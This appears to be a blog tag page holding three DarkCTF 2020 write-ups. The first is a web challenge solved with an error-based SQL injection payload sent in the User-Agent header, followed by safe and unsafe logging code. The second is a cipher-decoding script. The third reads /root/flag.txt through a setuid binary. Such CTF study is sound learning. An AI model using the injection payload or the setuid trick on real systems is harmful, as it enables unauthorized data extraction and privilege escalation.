
Archives of tag ctf


Tag ctf

DarkCTF 2020: Web/Agent-U

Web/Agent-U

395 points

Agent U stole a database from my company but I don't know which one. Can u help me to find it?

http://agent.darkarmy.xyz/

flag format darkCTF{databasename}

Solution

From the page source we can learn that the default credentials are admin/admin.

After login the site shows my user agent, so my first idea was to perform SQL injection through my user agent.

After a few attempts I finally ended up with the user agent below ;-)

', extractvalue(rand(),concat(0x3a,(SELECT concat(0x3a,schema_name) FROM information_schema.schemata LIMIT 1,1))), NULL); -- .

BINGO!

darkCTF{ag3nt_u_1s_v3ry_t3l3nt3d}
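
The defensive side of this challenge, as an added example that is not code from the challenge or the original write-up: a User-Agent logger written with string formatting beside the same logger using bound parameters. The table name, its three columns, the sample IP and the use of sqlite3 in place of the MySQL backend are assumptions.

```python
import sqlite3

# The User-Agent value shown in the write-up, used here only as input data.
PAYLOAD = ("', extractvalue(rand(),concat(0x3a,(SELECT concat(0x3a,schema_name) "
           "FROM information_schema.schemata LIMIT 1,1))), NULL); -- .")

def make_db():
    # Hypothetical three-column log table; the real schema is not on the page.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE uagents (uagent TEXT, ip TEXT, username TEXT)")
    return db

def log_unsafe(db, user_agent, ip, username):
    # Vulnerable pattern: the header is pasted into the SQL text, so a quote
    # in it ends the string literal and the rest is parsed as SQL.
    sql = ("INSERT INTO uagents VALUES ('%s', '%s', '%s')"
           % (user_agent, ip, username))
    db.execute(sql)

def log_safe(db, user_agent, ip, username):
    # Hardened pattern: placeholders keep the header as a bound value.
    db.execute("INSERT INTO uagents VALUES (?, ?, ?)",
               (user_agent, ip, username))

def handle_request(db, logger, user_agent):
    # Return a generic message on failure: error-based extraction such as the
    # extractvalue() trick needs the database error text echoed to the client.
    # In sqlite the injected MySQL functions do not exist, so the unsafe
    # statement fails, which itself shows the header was parsed as SQL.
    try:
        logger(db, user_agent, "203.0.113.7", "admin")  # constructed sample IP
        return "ok"
    except sqlite3.Error:
        return "internal error"

def stored_agents(db):
    return [row[0] for row in db.execute("SELECT uagent FROM uagents")]

if __name__ == "__main__":
    for logger in (log_unsafe, log_safe):
        db = make_db()
        print(logger.__name__, handle_request(db, logger, PAYLOAD),
              stored_agents(db))
```

With bound parameters the whole header, quote included, ends up as one stored string; with string formatting the database tries to execute it.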

DarkCTF 2020: Cryptography/WEIRD ENCRYPTION

Cryptography/WEIRD ENCRYPTION

377 points

I made this weird encryption I hope you can crack it.

File

enc.py

# `flag` is not defined in the published challenge file.
prefix="Hello. Your flag is DarkCTF{"
suffix="}."
# 16 tokens, one for each nibble value 0..15
main_string="c an u br ea k th is we ir d en cr yp ti on".split()

clear_text = prefix + flag + suffix
enc_text = ""
for letter in clear_text:
    c1 = ord(letter) // 16  # high nibble
    c2 = ord(letter) % 16   # low nibble
    enc_text += main_string[c1]
    enc_text += main_string[c2]

print(enc_text)

Encrypted

eawethkthcrthcrthonutiuckirthoniskisuucthththcrthanthisucthirisbruceaeathanisutheneabrkeaeathisenbrctheneacisirkonbristhwebranbrkkonbrisbranthypbrbrkonkirbrciskkoneatibrbrbrbrtheakonbrisbrckoneauisubrbreacthenkoneaypbrbrisyputi

Solution

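main_string = "c an u br ea k th is we ir d en cr yp ti on".split()
# Ciphertext from the challenge, saved as the file 'Encrypted'
flag = open('Encrypted', 'r').read().strip()

def decrypt(letter):
    # Two tokens are the high and low nibble of one character
    return main_string.index(letter[0]) * 16 + main_string.index(letter[1])


part = ''
letter = []
decrypted = ''
for j, i in enumerate(flag):
    part += i
    # 'c' is also a prefix of 'cr', so do not emit 'c' when 'r' follows;
    # the slice avoids an IndexError on the last character
    if part in main_string and not (part == 'c' and flag[j+1:j+2] == 'r'):
        letter.append(part)
        part = ''
    if len(letter) == 2:
        decrypted += chr(decrypt(letter))
        letter = []

print(decrypted)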

DarkCTF{[email protected][email protected]_M3}

 

DarkCTF 2020: Linux/Squids

Linux/Squids

470 points

Squids in the linux pool

Note: No automation tool required.

ssh [email protected] -p 10000 password: wolfie

Solution

Not much to comment, it took me literally a minute to find the flag.

I found a suspicious /opt dir with lots of dirs which I didn't want to check manually, so I executed find . from within /opt and found an iamroot binary, which looks like cat with root permissions (setuid). So I used the binary I found to have a look at /root/flag.txt

darkCTF{y0u_f0und_the_squ1d}